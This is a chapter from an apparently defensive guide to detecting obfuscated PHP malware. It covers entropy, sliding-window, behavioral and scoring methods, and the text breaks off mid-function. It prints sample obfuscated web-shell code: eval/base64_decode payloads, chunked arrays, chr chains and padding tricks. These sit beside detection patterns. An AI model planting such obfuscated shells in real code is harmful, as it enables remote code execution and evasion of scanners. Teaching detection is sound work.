Beyond signatures: How modern malware evades detection

In Chapter 4, we explored 87 malware signatures. You might think that’s enough to catch most threats. It’s not.

Modern attackers know what security scanners look for. They’ve studied signature databases, analyzed detection algorithms, and developed sophisticated techniques to fly under the radar. This chapter reveals those techniques - and how to defeat them.

The signature problem

Traditional scanners work like this:

1. Load signature database (patterns like "eval(base64_decode(")
2. Read each file
3. Match patterns against content
4. If match found → flag as malware

This approach has a fundamental flaw: attackers can read the same signature databases.
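
The four steps above can be sketched in a few lines. This is a minimal illustration, not the Chapter 4 scanner: the two-entry `$signatures` array and the `matchSignatures()` helper are hypothetical names invented for this example.

```php
<?php
// Hypothetical mini signature database: name => PCRE pattern.
$signatures = [
    'eval_base64'    => '/eval\s*\(\s*base64_decode\s*\(/i',
    'eval_gzinflate' => '/eval\s*\(\s*gzinflate\s*\(/i',
];

/**
 * Return the names of all signatures that match the given file content.
 */
function matchSignatures(string $content, array $signatures): array
{
    $hits = [];
    foreach ($signatures as $name => $pattern) {
        if (preg_match($pattern, $content) === 1) {
            $hits[] = $name;
        }
    }
    return $hits;
}

$original = <<<'PHP'
eval(base64_decode('ZWNobyAiaGFja2VkIjs='));
PHP;

// Same decoder, but its name is assembled from string fragments.
$evasive = <<<'PHP'
$f = 'bas'.'e64'.'_de'.'code';
$g = $f('ZWNobyAiaGFja2VkIjs=');
PHP;

$originalHits = matchSignatures($original, $signatures); // ['eval_base64']
$evasiveHits  = matchSignatures($evasive, $signatures);  // []
```

The second sample slips through because the literal text the pattern expects never appears in the file, which is exactly the weakness the rest of this chapter addresses.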

💀

The Arms Race

Every public signature database is a roadmap for attackers: each published signature tells them exactly which pattern to avoid, and a single pattern can usually be sidestepped in several ways. This is why signature-only scanners are fighting a losing battle.

What Attackers Do

When an attacker wants to evade eval(base64_decode( detection:

// Original (detected)
eval(base64_decode('ZWNobyAiaGFja2VkIjs='));

// Evasion v1: Variable indirection
$f = 'base64_decode';
$e = 'eval';
$e($f('ZWNobyAiaGFja2VkIjs='));

// Evasion v2: String building
$func = 'bas'.'e64'.'_de'.'code';
$exec = 'ev'.'al';
$exec($func('ZWNobyAiaGFja2VkIjs='));

// Evasion v3: Array chunks (defeats even v2 signatures)
$c = ['ZWNo', 'byAi', 'aGFj', 'a2Vk', 'Ijs='];
$f = implode('', array_map('chr', [98,97,115,101,54,52,95,100,101,99,111,100,101]));
$e = implode('', array_map('chr', [101,118,97,108]));
$e($f(implode('', $c)));

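Each version evades more signatures while aiming for the exact same result. The behavior is identical; the appearance is different. One caveat: eval is a language construct rather than a function, so PHP will not call it through a string variable as these snippets are written. The string-hiding idea itself works as shown for ordinary functions such as base64_decode, and real samples keep a literal eval somewhere or use a callable sink instead.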
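
All three variants share one visible trait: they call something through a variable. A rough way to surface that is to count call sites of the form `$name(`. The sketch below is an assumption-laden heuristic (the `countVariableCalls()` name is made up here), and it will also count legitimate dynamic calls such as callbacks, so it is a signal rather than a verdict.

```php
<?php
/**
 * Count call sites of the form $name( ... ), i.e. calls made through a variable.
 */
function countVariableCalls(string $code): int
{
    return (int) preg_match_all('/\$[A-Za-z_]\w*\s*\(/', $code);
}

$evasionV1 = <<<'PHP'
$f = 'base64_decode';
$e = 'eval';
$e($f('ZWNobyAiaGFja2VkIjs='));
PHP;

$ordinary = <<<'PHP'
$name = trim($input);
echo strlen($name);
PHP;

$suspiciousCalls = countVariableCalls($evasionV1); // 2: $e( and $f(
$ordinaryCalls   = countVariableCalls($ordinary);  // 0
```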

Enter entropy analysis

Entropy is a measure of randomness or unpredictability in data. It’s borrowed from information theory - specifically, Shannon entropy.

Entropy range (bits per byte)	Typical content
4.5-5.5	Normal PHP
5.8+	Obfuscated code
<4.0	Padded/evasion

Understanding Entropy Intuitively

Think of entropy as measuring “surprise”:

Low entropy (predictable): “AAAAAAAAAAAAAAAA” - no surprise, you know what comes next
Medium entropy (structured): “function validateUser($id)” - has patterns but variety
High entropy (random): “7hK9xQ2mL5nR8pT3” - each character is a surprise

Normal PHP code has medium entropy (4.5-5.5 on a 0-8 scale) because:

Variable names follow conventions ($user, $request)
Keywords repeat (function, return, if)
Structure is predictable (indentation, brackets)

Base64-encoded malware has high entropy (5.8+) because:

All 64 Base64 characters appear with similar frequency (the ceiling for a 64-symbol alphabet is log₂ 64 = 6 bits)
No recognizable patterns
Looks like random gibberish

Shannon Entropy Formula

H(X) = -Σ p(x) × log₂(p(x))

Where:

- H(X) = entropy of the data
- p(x) = probability of character x appearing
- Σ = sum over all unique characters

For a file with 256 unique byte values appearing equally:
H = -256 × (1/256 × log₂(1/256)) = 8 bits (maximum entropy)
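
The formula translates directly into code. Here is a minimal sketch that treats each byte as one symbol; the function name `shannonEntropy()` is our own choice for this example and is not necessarily how the `calculateEntropy()` used later in this chapter is written.

```php
<?php
/**
 * Shannon entropy of a byte string, in bits per byte (0.0 to 8.0).
 */
function shannonEntropy(string $data): float
{
    $length = strlen($data);
    if ($length === 0) {
        return 0.0;
    }

    $entropy = 0.0;
    // count_chars() in mode 1 returns only the byte values that occur, with their counts.
    foreach (count_chars($data, 1) as $count) {
        $p = $count / $length;          // p(x)
        $entropy -= $p * log($p, 2);    // accumulate -p(x) * log2(p(x))
    }
    return $entropy;
}

// One repeated symbol: no surprise at all.
$uniform = shannonEntropy(str_repeat('A', 16));

// Every possible byte value exactly once: the maximum of 8 bits.
$allBytes = shannonEntropy(implode('', array_map('chr', range(0, 255))));
```

The two calls reproduce the extremes described above: `$uniform` comes out at 0 and `$allBytes` at 8, up to floating-point rounding.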

Why Attackers Fear Entropy Scanners

Early entropy scanners caught obfuscated malware easily:

File: malicious.php
Global Entropy: 6.7 (HIGH - SUSPICIOUS)
→ Flag for review

But attackers adapted. They developed entropy evasion techniques - ways to artificially lower their malware’s entropy to look like normal code.

The 5 entropy evasion techniques

Through extensive research, we’ve identified five primary techniques attackers use to manipulate entropy:

Technique	Method	Effect on Entropy
Comment Padding	Add voluminous repetitive comments	Lowers global entropy
Variable Name Engineering	Use predictable, long variable names	Lowers character diversity
Chunked Payload	Split payload into small pieces	Distributes high-entropy regions
String Steganography	Hide data in invisible characters	Adds entropy invisibly
Whitespace Manipulation	Add excessive whitespace	Dilutes entropy calculation

Let’s examine each one in detail.

Technique 1: Comment padding

Goal: Dilute high-entropy payload with low-entropy comments.

Comment Padding Evasion MALICIOUS CODE

<?php
/*
* This is a legitimate configuration file for the application.
* This is a legitimate configuration file for the application.
* This is a legitimate configuration file for the application.
* This is a legitimate configuration file for the application.
* [... 500 more identical lines ...]
*/

// Configuration settings
// Configuration settings
// Configuration settings

$c = base64_decode('ZXZhbCgkX1BPU1RbJ2NtZCddKTs=');
eval($c);

/*
* End of configuration file.
* End of configuration file.
* End of configuration file.
* End of configuration file.
*/

Why it works: The malicious payload is 2 lines. The padding is 1000+ lines of repetitive, low-entropy text. The global entropy of the file drops from 6.5 to 4.8 - appearing normal.

Detection: CommentPaddingDetector

We counter this by comparing entropy with and without comments:

Indicator	Threshold	What It Means
Entropy delta	> 1.5	Big difference with/without comments
Comment ratio	> 60%	File is mostly comments
Repetition score	> 40%	Same lines repeated
Vocabulary ratio	< 15%	Very few unique words

// Detection logic
$entropyWithComments = calculateEntropy($content);
$entropyWithout = calculateEntropy(stripComments($content));
$delta = $entropyWithout - $entropyWithComments;

if ($delta > 1.5) {
    // Comments are artificially lowering entropy
    // Investigate the non-comment code!
}
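
The snippet above relies on two helpers it does not show. One plausible way to fill them in, assuming PHP's built-in tokenizer is available, is sketched below. The names `entropyBits()`, `stripPhpComments()` and `commentPaddingIndicators()` are hypothetical, and only two of the four indicators from the table are computed.

```php
<?php
/** Shannon entropy in bits per byte. */
function entropyBits(string $data): float
{
    $length = strlen($data);
    if ($length === 0) {
        return 0.0;
    }
    $entropy = 0.0;
    foreach (count_chars($data, 1) as $count) {
        $p = $count / $length;
        $entropy -= $p * log($p, 2);
    }
    return $entropy;
}

/** Drop every comment token, keeping all other source text unchanged. */
function stripPhpComments(string $source): string
{
    $out = '';
    foreach (token_get_all($source) as $token) {
        if (is_array($token)) {
            if ($token[0] === T_COMMENT || $token[0] === T_DOC_COMMENT) {
                continue; // skip //, # and /* */ comments
            }
            $out .= $token[1];
        } else {
            $out .= $token; // single-character tokens such as ';' or '('
        }
    }
    return $out;
}

/** Compute the entropy delta and comment ratio for one file. */
function commentPaddingIndicators(string $source): array
{
    $stripped = stripPhpComments($source);
    return [
        'entropyDelta' => entropyBits($stripped) - entropyBits($source),
        'commentRatio' => 1 - strlen($stripped) / max(strlen($source), 1),
    ];
}

// Synthetic sample modeled on the padded file shown earlier.
$padded = "<?php\n/*\n"
    . str_repeat("* This is a legitimate configuration file for the application.\n", 500)
    . "*/\n\$c = base64_decode('ZXZhbCgkX1BPU1RbJ2NtZCddKTs=');\neval(\$c);\n";

$indicators = commentPaddingIndicators($padded);
```

Using the tokenizer instead of a regex avoids mistaking `//` inside a string literal for a comment. Whether a given file crosses the thresholds in the table depends on its actual content, so treat the output as input to the scoring step rather than a verdict.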

ℹ️

Real Detection Numbers

In our implementation, we require at least 2 indicators with combined confidence above 40% before flagging. This prevents false positives on legitimately well-documented code.

Technique 2: Variable name engineering

Goal: Use predictable, long variable names to lower character diversity.

Variable Name Engineering MALICIOUS CODE

<?php
$temporaryDataBufferStorageVariableOne = 'ZX';
$temporaryDataBufferStorageVariableTwo = 'Zh';
$temporaryDataBufferStorageVariableThree = 'bC';
$temporaryDataBufferStorageVariableFour = 'gk';
$temporaryDataBufferStorageVariableFive = 'X1';
$temporaryDataBufferStorageVariableSix = 'BP';
$temporaryDataBufferStorageVariableSeven = 'U1';
$temporaryDataBufferStorageVariableEight = 'Rb';
$temporaryDataBufferStorageVariableNine = 'J2';
$temporaryDataBufferStorageVariableTen = 'Nt';

$resultOutputDataString =
$temporaryDataBufferStorageVariableOne .
$temporaryDataBufferStorageVariableTwo .
$temporaryDataBufferStorageVariableThree .
/* ... continues ... */;

$executionFunctionVariable = 'eval';
$decodeFunctionVariable = 'base64_decode';
$executionFunctionVariable($decodeFunctionVariable($resultOutputDataString));

Why it works: The long, repetitive variable names add predictable characters. Words like “temporary”, “Data”, “Buffer”, “Storage”, “Variable” appear constantly, lowering entropy.

Detection: VariableNameEngineeringDetector

Indicator	Threshold	What It Means
Average length	> 25 chars	Unusually long variable names
Very long count	> 3 variables over 40 chars	Padding behavior
Sequential patterns	> 5 numbered vars	$var1, $var2, $var3…
Repetitive affixes	> 40% same suffix/prefix	Same endings/beginnings

Known padding words we look for:

data, buffer, temp, var, string, value, content
result, output, input, param, arg, item, element

When these words appear repeatedly in variable names, suspicion increases.
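
As a rough illustration of the first indicator and the padding-word check, the sketch below collects the distinct variable names in a file and measures them. `analyzeVariableNames()` and the `PADDING_WORDS` constant are names invented for this example; the word list is the one given above.

```php
<?php
// Padding words from the list above, matched case-insensitively.
const PADDING_WORDS = [
    'data', 'buffer', 'temp', 'var', 'string', 'value', 'content',
    'result', 'output', 'input', 'param', 'arg', 'item', 'element',
];

/**
 * Measure the distinct variable names found in a piece of PHP source.
 */
function analyzeVariableNames(string $code): array
{
    preg_match_all('/\$([A-Za-z_]\w*)/', $code, $matches);
    $names = array_values(array_unique($matches[1]));
    if ($names === []) {
        return ['count' => 0, 'averageLength' => 0.0, 'paddingWordHits' => 0];
    }

    $totalLength = 0;
    $paddingHits = 0;
    foreach ($names as $name) {
        $totalLength += strlen($name);
        foreach (PADDING_WORDS as $word) {
            $paddingHits += substr_count(strtolower($name), $word);
        }
    }

    return [
        'count'           => count($names),
        'averageLength'   => $totalLength / count($names),
        'paddingWordHits' => $paddingHits,
    ];
}

$sample = <<<'PHP'
$temporaryDataBufferStorageVariableOne = 'ZX';
$temporaryDataBufferStorageVariableTwo = 'Zh';
$resultOutputDataString = $temporaryDataBufferStorageVariableOne
    . $temporaryDataBufferStorageVariableTwo;
PHP;

$stats = analyzeVariableNames($sample);
// Three distinct names of 37, 37 and 22 characters: average 32, above the 25-char threshold.
```

Substring matching is deliberately crude: `var` also matches inside `variable`. A production detector would likely split camelCase names into words first.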

Technique 3: Chunked payload distribution

Goal: Break high-entropy payload into small chunks that individually appear normal.

Chunked Payload Attack MALICIOUS CODE

<?php
// Looks like configuration data
$config = [];
$config[] = 'ZX';
$config[] = 'Zh';
$config[] = 'bC';
$config[] = 'gk';
$config[] = 'X1';
$config[] = 'BP';
$config[] = 'U1';
$config[] = 'Rb';
$config[] = 'J2';
$config[] = 'Nt';
$config[] = 'ZC';
$config[] = 'dd';
$config[] = 'KT';
$config[] = 's=';

// Reconstruction - the dangerous part
$payload = implode('', $config);
$fn = chr(101).chr(118).chr(97).chr(108); // "eval"
$fn(base64_decode($payload));

Why it works: Each 2-character chunk has low entropy. A sliding window of 256 bytes won’t see a concentrated high-entropy region. The payload is distributed across the file.

Detection: ChunkedPayloadDetector

We look for the reconstruction patterns:

Pattern	Description	Confidence
Array building	`$arr[] = 'xx';` repeated	70%
implode + eval	Reconstruction into execution	95%
implode + base64_decode	Decoding reconstructed string	90%
chr() chains	Building strings from ASCII	85%
Uniform string lengths	All strings same size	70%

// Key detection patterns
$dangerousReconstruction = [
    'base64_chunks' => '/base64_decode\s*\(\s*implode/',
    'gzinflate_chunks' => '/gzinflate\s*\(\s*implode/',
    'chr_building' => '/chr\s*\(\s*\d+\s*\)\s*\.\s*chr/',
];
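
To show how these patterns might be applied, here is a small sketch that runs them against a file and adds the array-building check from the table. The function name `detectChunkedPayload()` and the cutoff of five appends are assumptions made for this example.

```php
<?php
$dangerousReconstruction = [
    'base64_chunks'    => '/base64_decode\s*\(\s*implode/',
    'gzinflate_chunks' => '/gzinflate\s*\(\s*implode/',
    'chr_building'     => '/chr\s*\(\s*\d+\s*\)\s*\.\s*chr/',
];

/**
 * Return the names of all reconstruction indicators found in the code.
 */
function detectChunkedPayload(string $code, array $patterns): array
{
    $findings = [];
    foreach ($patterns as $name => $pattern) {
        if (preg_match($pattern, $code) === 1) {
            $findings[] = $name;
        }
    }

    // Count repeated `$arr[] = 'xx';` appends (assumed cutoff: 5 or more).
    $appends = (int) preg_match_all('/\$\w+\[\]\s*=\s*([\'"])[^\'"]*\1\s*;/', $code);
    if ($appends >= 5) {
        $findings[] = 'array_building';
    }
    return $findings;
}

$sample = <<<'PHP'
$config = [];
$config[] = 'ZX';
$config[] = 'Zh';
$config[] = 'bC';
$config[] = 'gk';
$config[] = 'X1';
$config[] = 'BP';
$payload = implode('', $config);
$fn = chr(101).chr(118).chr(97).chr(108);
$fn(base64_decode($payload));
PHP;

$findings = detectChunkedPayload($sample, $dangerousReconstruction);
// ['chr_building', 'array_building']
```

Note that `base64_chunks` does not fire here: the sample stores the `implode()` result in `$payload` before decoding it, so the two calls are never nested. Regex patterns only see direct nesting, which is one reason data flow tracking (covered later in this chapter) is needed alongside them.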

🚨

AI Polymorphism Uses This

AI-generated malware heavily uses chunked payloads because each instance can have a different chunk order, different array variable names, and different reconstruction methods. This is why we focus on detecting the reconstruction, not the chunks themselves.

Technique 4: String steganography

Goal: Hide data using invisible Unicode characters or look-alike characters.

Invisible Characters

These Unicode characters are invisible but present in the string:

Character	Unicode	Name
	U+200B	Zero Width Space
‌	U+200C	Zero Width Non-Joiner
‍	U+200D	Zero Width Joiner
	U+FEFF	Byte Order Mark
	U+00AD	Soft Hyphen
⁠	U+2060	Word Joiner

Invisible Character Encoding MALICIOUS CODE

<?php
// Looks like a normal string, but contains hidden data
$message = "Hello‌‍‌‌World";  // ZWSP patterns encode binary

// Decoder extracts binary from invisible char positions
$binary = '';
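$length = mb_strlen($message, 'UTF-8'); // count characters, not bytes
for ($i = 0; $i < $length; $i++) {
  $char = mb_substr($message, $i, 1, 'UTF-8');
  if ($char === "\u{200B}") $binary .= '0'; // Zero Width Space
  if ($char === "\u{200C}") $binary .= '1'; // Zero Width Non-Joiner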
}
// $binary could be: "01001000" = 'H' = start of payload

Homoglyphs

Characters from different scripts that look identical:

Latin	Cyrillic	They Look The Same
a	а	Yes
e	е	Yes
o	о	Yes
c	с	Yes
p	р	Yes

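An attacker could write еval (Cyrillic ‘е’) instead of eval (Latin ‘e’). A signature scanner looking for eval won’t match, and a human reviewer won’t see the difference. PHP treats the two as different identifiers, so the look-alike does not invoke the built-in eval; the risk is that PHP accepts non-ASCII identifiers, letting an attacker define functions and variables whose names pass for trusted ones.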

Detection: StringSteganographyDetector

We scan for:

Invisible characters - Any ZWSP, ZWNJ, BOM, etc.
Homoglyph mixing - Cyrillic in otherwise Latin text
Mixed scripts - Latin + Cyrillic + Greek in same string
Non-printable characters - Control characters hidden in strings
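
The first three checks can be approximated with Unicode-aware regular expressions. The sketch below is a simplified illustration: `detectStringSteganography()` is a hypothetical name, it covers only the six invisible characters from the table above, and it flags a word only when scripts are mixed inside that single word.

```php
<?php
/**
 * Count invisible characters and list words that mix Latin, Cyrillic or Greek letters.
 */
function detectStringSteganography(string $text): array
{
    $invisible = (int) preg_match_all(
        '/[\x{200B}\x{200C}\x{200D}\x{FEFF}\x{00AD}\x{2060}]/u',
        $text
    );

    $mixedWords = [];
    // Split into identifier-like words made of letters, digits and underscores.
    preg_match_all('/[\p{L}\p{N}_]+/u', $text, $words);
    foreach ($words[0] as $word) {
        $scripts = 0;
        foreach (['Latin', 'Cyrillic', 'Greek'] as $script) {
            $scripts += (int) preg_match('/\p{' . $script . '}/u', $word);
        }
        if ($scripts >= 2) {
            $mixedWords[] = $word;
        }
    }

    return ['invisibleCount' => $invisible, 'mixedScriptWords' => $mixedWords];
}

// "\u{200C}" and "\u{200D}" are ZWNJ and ZWJ; "\u{0435}" is Cyrillic 'е'.
$sample = "\$x = \"Hello\u{200C}\u{200D}World\"; \u{0435}val(\$x);";
$report = detectStringSteganography($sample);
// invisibleCount: 2, mixedScriptWords: one entry, the look-alike "еval"
```

Checking per word rather than per file keeps legitimately localized comments or strings (for example, a Russian-language message next to English code) from triggering the mixed-script indicator.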

Technique 5: Whitespace manipulation

Goal: Pad file with whitespace to dilute entropy.

Whitespace Padding MALICIOUS CODE

<?php

[... long runs of blank lines, spaces, and tabs ...]

eval(base64_decode('ZXZhbCgkX1BPU1RbJ2NtZCddKTs='));

Why it works: A long run of whitespace draws on only a handful of byte values (space, tab, newline), so it is highly predictable and has very low entropy. A file that is 90% whitespace has a far lower global entropy than the payload alone.

Detection: WhitespaceManipulationDetector

Indicator	Threshold	Meaning
Whitespace ratio	> 40%	Unusually whitespace-heavy file
Entropy delta	> 2.0	Big difference with/without whitespace
Blank line ratio	> 30%	Too many empty lines
Consecutive blanks	> 10	Suspicious padding
Low entropy regions	> 3 windows	Concentrated whitespace areas
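
Three of these indicators need nothing more than counting. A minimal sketch, with `analyzeWhitespace()` as a made-up name and a synthetic sample standing in for a padded file:

```php
<?php
/**
 * Compute simple whitespace indicators for a file's content.
 */
function analyzeWhitespace(string $content): array
{
    $length = strlen($content);
    if ($length === 0) {
        return ['whitespaceRatio' => 0.0, 'blankLineRatio' => 0.0, 'longestBlankRun' => 0];
    }

    $whitespaceBytes = (int) preg_match_all('/\s/', $content);
    $lines = explode("\n", $content);

    $blankLines = 0;
    $currentRun = 0;
    $longestRun = 0;
    foreach ($lines as $line) {
        if (trim($line) === '') {
            $blankLines++;
            $currentRun++;
            $longestRun = max($longestRun, $currentRun);
        } else {
            $currentRun = 0;
        }
    }

    return [
        'whitespaceRatio' => $whitespaceBytes / $length,
        'blankLineRatio'  => $blankLines / count($lines),
        'longestBlankRun' => $longestRun,
    ];
}

// 50 lines containing only spaces and a tab, followed by the one-line payload.
$padded = "<?php\n"
    . str_repeat("   \t \n", 50)
    . "eval(base64_decode('ZXZhbCgkX1BPU1RbJ2NtZCddKTs='));\n";

$stats = analyzeWhitespace($padded);
```

For this sample all three values land well above the thresholds in the table: the longest blank run is 50 lines, and more than 80% of the bytes are whitespace.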

The power of sliding window analysis

Global entropy can be manipulated. Local entropy is harder to fake.

Sliding window analysis divides a file into overlapping chunks and measures each one’s entropy:

File: malicious_padded.php (10000 bytes)

Sliding Window Configuration:
- Window size: 256 bytes
- Step: 64 bytes
- Windows analyzed: ~155

Results:
Window 0-256:    Entropy 3.2 (comments/padding)
Window 64-320:   Entropy 3.4 (comments/padding)
Window 128-384:  Entropy 3.5 (comments/padding)
...
Window 4096-4352: Entropy 6.8 ← ANOMALY! Hidden payload
Window 4160-4416: Entropy 6.7 ← ANOMALY!
...
Window 9800-10000: Entropy 3.1 (comments/padding)

Global Entropy: 4.2 (appears normal)
But: Local anomalies detected at byte 4096-4500

The global entropy looks normal (4.2), but the sliding window reveals a high-entropy region in the middle - that’s where the malicious payload is hidden.
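
A sliding window pass is short to write. The sketch below uses the 256-byte window and 64-byte step from the configuration above and only measures full windows; `windowEntropy()` and `slidingWindowEntropy()` are names chosen for this example, and the test file is synthetic (repetitive comment text with a block of all 256 byte values standing in for a hidden payload).

```php
<?php
/** Shannon entropy in bits per byte. */
function windowEntropy(string $data): float
{
    $length = strlen($data);
    if ($length === 0) {
        return 0.0;
    }
    $entropy = 0.0;
    foreach (count_chars($data, 1) as $count) {
        $p = $count / $length;
        $entropy -= $p * log($p, 2);
    }
    return $entropy;
}

/**
 * Measure entropy for each full window of $windowSize bytes, advancing by $step bytes.
 */
function slidingWindowEntropy(string $content, int $windowSize = 256, int $step = 64): array
{
    $windows = [];
    $length = strlen($content);
    for ($offset = 0; $offset + $windowSize <= $length; $offset += $step) {
        $windows[] = [
            'offset'  => $offset,
            'entropy' => windowEntropy(substr($content, $offset, $windowSize)),
        ];
    }
    return $windows;
}

// Build a 10000-byte file: padding, a 512-byte high-entropy block at offset 4096, more padding.
$padding = str_repeat("// config\n", 1000);
$payload = str_repeat(implode('', array_map('chr', range(0, 255))), 2);
$content = substr($padding, 0, 4096) . $payload . substr($padding, 0, 10000 - 4096 - 512);

$windows = slidingWindowEntropy($content);
$peak = max(array_column($windows, 'entropy'));
```

With full windows only, a 10000-byte file yields 153 windows. The padding windows stay near 3 bits, while the windows covering the synthetic block reach 8 bits, so the anomaly stands out regardless of the file's global entropy.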

Z-Score Anomaly Detection

We use statistical z-scores to find outliers:

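// Calculate mean and standard deviation of all window entropies
$entropies = array_column($windows, 'entropy');
$mean = array_sum($entropies) / count($entropies);
$variance = array_sum(array_map(fn($e) => ($e - $mean) ** 2, $entropies)) / count($entropies);
$stdDev = sqrt($variance);

// Any window more than 2 standard deviations from the mean is anomalous
foreach ($windows as $window) {
    if ($stdDev == 0.0) {
        break; // every window has the same entropy, so nothing stands out
    }
    $zScore = abs($window['entropy'] - $mean) / $stdDev;
    if ($zScore > 2.0) {
        // This region is statistically abnormal
        flagAsAnomaly($window);
    }
}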

Behavioral analysis: The future

Signatures tell us what code looks like. Behavioral analysis tells us what code does.

✅

The Key Insight

No matter how an attacker obfuscates eval($_POST['cmd']), the behavior is the same: user input flows to a code execution function. We should detect the flow, not the appearance.

Data Flow Tracking

Instead of pattern matching, we track how data moves:

User Input Source        →  Transformation  →  Dangerous Sink
─────────────────────────────────────────────────────────────
$_GET['x']               →  base64_decode   →  eval()
$_POST['data']           →  decrypt()       →  unserialize()
$_REQUEST['cmd']         →  (none)          →  system()
$_COOKIE['token']        →  gzinflate()     →  assert()

If data flows from any user input to any dangerous sink, we flag it - regardless of how the code looks.
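
To make the idea concrete, here is a deliberately naive taint tracker. It is a sketch under strong assumptions, not a real data flow engine: it splits code on semicolons, handles only simple `$var = expression` assignments, ignores control flow and functions, and knows just four sinks. All names (`USER_INPUT`, `DANGEROUS_SINKS`, `isTainted()`, `findTaintedSinks()`) are invented for this example.

```php
<?php
const USER_INPUT = '/\$_(GET|POST|REQUEST|COOKIE)\b/';
const DANGEROUS_SINKS = ['eval', 'assert', 'system', 'unserialize'];

/** An expression is tainted if it reads user input or any already-tainted variable. */
function isTainted(string $expression, array $taintedVars): bool
{
    if (preg_match(USER_INPUT, $expression) === 1) {
        return true;
    }
    preg_match_all('/\$\w+/', $expression, $vars);
    foreach ($vars[0] as $var) {
        if (isset($taintedVars[$var])) {
            return true;
        }
    }
    return false;
}

/** Return the sinks that receive tainted data, in order of appearance. */
function findTaintedSinks(string $code): array
{
    $code = preg_replace('/^\s*<\?php/', '', $code);
    $tainted = [];
    $findings = [];

    foreach (explode(';', $code) as $statement) {
        // Propagate taint through simple assignments: $var = <expression>
        if (preg_match('/^\s*(\$\w+)\s*=(?!=)\s*(.+)$/s', $statement, $m) === 1
            && isTainted($m[2], $tainted)) {
            $tainted[$m[1]] = true;
        }
        // Flag any sink whose argument list is tainted.
        foreach (DANGEROUS_SINKS as $sink) {
            $callPattern = '/\b' . $sink . '\s*\((.*)\)/is';
            if (preg_match($callPattern, $statement, $m) === 1 && isTainted($m[1], $tainted)) {
                $findings[] = $sink;
            }
        }
    }
    return $findings;
}

$flagged = findTaintedSinks('$a = $_GET[\'x\']; $b = base64_decode($a); eval($b);');
$clean   = findTaintedSinks('$a = \'static\'; eval($a);');
```

The first sample is flagged even though the input passes through two variables and a decoder before reaching `eval`, while the second is not, because nothing user-controlled reaches the sink. A production implementation would work on the parsed syntax tree rather than on raw text.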

Why This Defeats AI Polymorphism

AI-generated malware can change its appearance as often as every 15-60 seconds:

Variable names randomized
Function order shuffled
String encoding varies
Comment patterns change

But the behavior stays the same. The malware still needs to:

Receive attacker commands (input)
Execute those commands (sink)

Behavioral analysis catches every variant that keeps this input-to-sink flow, however it is dressed up.

Weighted scoring: Combining everything

No single technique is perfect. We combine multiple signals:

Component	Weight	What It Measures
Signature matches	35%	Known malware patterns
Behavioral analysis	25%	Data flow to dangerous sinks
Entropy analysis	15%	Statistical anomalies
Structural analysis	10%	Code structure oddities
Context analysis	15%	File location, naming
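
Combining the components is a weighted sum. The sketch below assumes each component reports a score between 0.0 and 1.0, which the table does not specify; `COMPONENT_WEIGHTS` and `combineScores()` are hypothetical names.

```php
<?php
// Weights from the table above; they sum to 1.0.
const COMPONENT_WEIGHTS = [
    'signature'  => 0.35,
    'behavioral' => 0.25,
    'entropy'    => 0.15,
    'structural' => 0.10,
    'context'    => 0.15,
];

/**
 * Combine per-component scores (assumed range 0.0 to 1.0) into one weighted score.
 * Missing components count as 0.
 */
function combineScores(array $componentScores): float
{
    $total = 0.0;
    foreach (COMPONENT_WEIGHTS as $component => $weight) {
        $total += $weight * ($componentScores[$component] ?? 0.0);
    }
    return $total;
}

// No signature hit, but strong behavioral and contextual evidence.
$score = combineScores([
    'signature'  => 0.0,
    'behavioral' => 1.0,
    'entropy'    => 0.8,
    'structural' => 0.5,
    'context'    => 1.0,
]);
// 0.25 + 0.12 + 0.05 + 0.15 = 0.57
```

The example shows why the combination matters: a file that evades every signature still reaches 57% on the strength of the other signals.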

Context Modifiers

Not all detections are equal. We adjust scores based on context:

Context	Modifier	Reason
`vendor/`	-40%	Third-party code, expected patterns
`storage/framework/views/`	-50%	Compiled Blade templates
`bootstrap/cache/`	-45%	Framework cache files
`public/uploads/`	+40%	PHP shouldn’t be here
`.hidden/`	+35%	Suspicious directory
Random filename	+20%	`x7kd92.php` is suspicious

Confidence Thresholds

Based on final score, we recommend actions:

Confidence	Action	Automated?
≥ 85%	QUARANTINE - Move to isolation, alert admin	Yes
65-84%	REVIEW - Flag for manual inspection	No
40-64%	MONITOR - Add to watchlist	No
< 40%	CLEAN - No action needed	-
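
The modifiers and thresholds can be wired together as follows. One important assumption: the tables do not say how a modifier is applied, so this sketch scales the score multiplicatively (a -40% modifier multiplies the score by 0.6) and clamps the result to 0-100. The names `CONTEXT_MODIFIERS`, `applyContext()` and `recommendAction()` are invented here, and the random-filename modifier is left out.

```php
<?php
// Path fragment => modifier, taken from the context table above.
const CONTEXT_MODIFIERS = [
    'vendor/'                  => -0.40,
    'storage/framework/views/' => -0.50,
    'bootstrap/cache/'         => -0.45,
    'public/uploads/'          => 0.40,
    '.hidden/'                 => 0.35,
];

/**
 * Adjust a 0-100 score by every modifier whose path fragment occurs in $path.
 * Assumption: modifiers scale the score multiplicatively.
 */
function applyContext(float $score, string $path): float
{
    foreach (CONTEXT_MODIFIERS as $fragment => $modifier) {
        if (strpos($path, $fragment) !== false) {
            $score *= 1 + $modifier;
        }
    }
    return max(0.0, min(100.0, $score));
}

/** Map a final confidence (0-100) to the recommended action. */
function recommendAction(float $confidence): string
{
    if ($confidence >= 85) {
        return 'QUARANTINE';
    }
    if ($confidence >= 65) {
        return 'REVIEW';
    }
    if ($confidence >= 40) {
        return 'MONITOR';
    }
    return 'CLEAN';
}

$uploadAction = recommendAction(applyContext(57.0, 'public/uploads/x7kd92.php'));
$vendorAction = recommendAction(applyContext(70.0, 'vendor/acme/lib/Loader.php'));
```

Under these assumptions the same kind of evidence leads to different outcomes: a score of 57 in `public/uploads/` rises to roughly 80 and lands in REVIEW, while a score of 70 in `vendor/` falls to 42 and lands in MONITOR.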

The 15-dimensional feature vector

For advanced analysis, we compute 15 statistical features:

Entropy Features (3)

Global entropy
Entropy variance across windows
Entropy range (max - min)

Character Distribution (4)

Printable character ratio
Alphabetic ratio
Digit ratio
Special character ratio

Code Metrics (3)

Average line length
Maximum line length
Blank line ratio

String Analysis (2)

Long string count (strings over 100 chars)
Base64 likelihood score

Function Analysis (3)

Dangerous function count
Obfuscation indicator count
Variable function call count

This 15-dimensional vector provides a fingerprint of the file that’s difficult to manipulate without changing actual behavior.
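
As an illustration, seven of the fifteen features (character distribution and code metrics) can be computed with a handful of counts. The exact definitions are assumptions for this sketch: "printable" means ASCII 0x20-0x7E and "special" means anything that is not a letter, digit, or whitespace. `extractBasicFeatures()` is a hypothetical name.

```php
<?php
/**
 * Compute the character-distribution and code-metric features for one file.
 */
function extractBasicFeatures(string $content): array
{
    $length = max(strlen($content), 1); // avoid division by zero on empty input
    $lines = explode("\n", $content);
    $lineLengths = array_map('strlen', $lines);
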